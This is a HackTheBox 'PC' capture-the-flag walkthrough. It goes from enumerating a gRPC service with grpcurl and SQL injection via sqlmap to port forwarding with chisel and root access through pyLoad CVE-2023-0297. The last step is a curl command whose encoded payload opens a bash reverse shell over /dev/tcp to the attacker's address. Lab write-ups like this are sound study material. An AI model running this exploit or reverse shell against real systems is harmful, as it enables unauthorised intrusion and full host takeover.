4.9 KiB
HackTheBox - PC
NMAP
Nmap scan report for 10.129.19.240
Host is up (0.21s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 91bf44edea1e3224301f532cea71e5ef (RSA)
| 256 8486a6e204abdff71d456ccf395809de (ECDSA)
|_ 256 1aa89572515e8e3cf180f542fd0a281c (ED25519)
50051/tcp open unknown
PORT 50051
Connecting to this port through telnet or netcat, doesn't yield anything but ???
So resarching what runs on port 50051 shows that, gRPC uses this port which is an open source remote procedure call framework by google
We can analyze the traffic through wireshark by sniffing packets on our interface (tun0) and changing protocol to HTTP/2
gRPC can be enumerated through grpcurl
grpcurl -plaintext 10.129.19.240:50051 list
This listed two services, let's try listing the methods in SimpleApp
SimpleApp service has three methods which can be checked with describe arguement
We can register and login with an account which in return provides an id
grpcurl -plaintext -d '{"username":"arz101" , "password":"12345"}' 10.129.19.240:50051 SimpleApp/RegisterUser
grpcurl -plaintext -d '{"username":"arz101" , "password":"12345"}' 10.129.19.240:50051 SimpleApp/LoginUser
Now using getInfo will ask for a token
Foothold
If we go back to login method, we do use a token if we enable verbosity with -vv
grpcurl -vv -plaintext -H "token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiYXJ6MTAxIiwiZXhwIjoxNjg0NjkzODY1fQ.CMWWeEN92nUfwMh8_AUGBPjHsIC7oIRTVDBZEy2qDS8" 10.129.19.240:50051 SimpleApp/getInfo
This gives us an error `Unexpected : bad argument type for built-in operation` due to we haven't specified the data, if we use `describe` to see what parameters the method accepts
It needs the ID which we get after logging in
grpcurl -vv -plaintext -H "token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiYXJ6MTAxIiwiZXhwIjoxNjg0NjkzODY1fQ.CMWWeEN92nUfwMh8_AUGBPjHsIC7oIRTVDBZEy2qDS8" -d '{"id": "842"}' 10.129.19.240:50051 SimpleApp/getInfo
But tampering/playing around with this was a little difficult, so I tried postman and grpcui which gives you GUI with which you can work with gRPC service and also intercept the requests easily
After identifiying that it was using some filters for sqli, we can try running sqlmap which found injection on id parameter
With these credentials, we can login as sau user
Having enumerated the SUIDs, the files which are owned sau none of them yield any path to escalation, checking the local ports, there was port 8000 open which redirects to a login page
Port forwarding with chisel
chisel server -p 3333 --reverse
chisel client 10.10.16.19:3333 R:localhost:8000
Now accessing the port on our browser we'll get a login page for pyLoad which is a download manager for python
Trying the default creds like admin:admin and pyload:pyload didn't work, so searching for CVEs there was a pre-auth rce vulnerability (CVE-2023-0297)
Using the poc we'll get a shell as the root user
curl -i -s -k -X $'POST' \
--data-binary $'jk=pyimport%20os;os.system(\"%2Fbin%2Fbash%20%2Dc%20%27bash%20%2Di%20%3E%26%20%2Fdev%2Ftcp%2F10%2E10%2E16%2E19%2F2222%200%3E%261%27\");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa' \
$'http://localhost:8000/flash/addcrypted2'
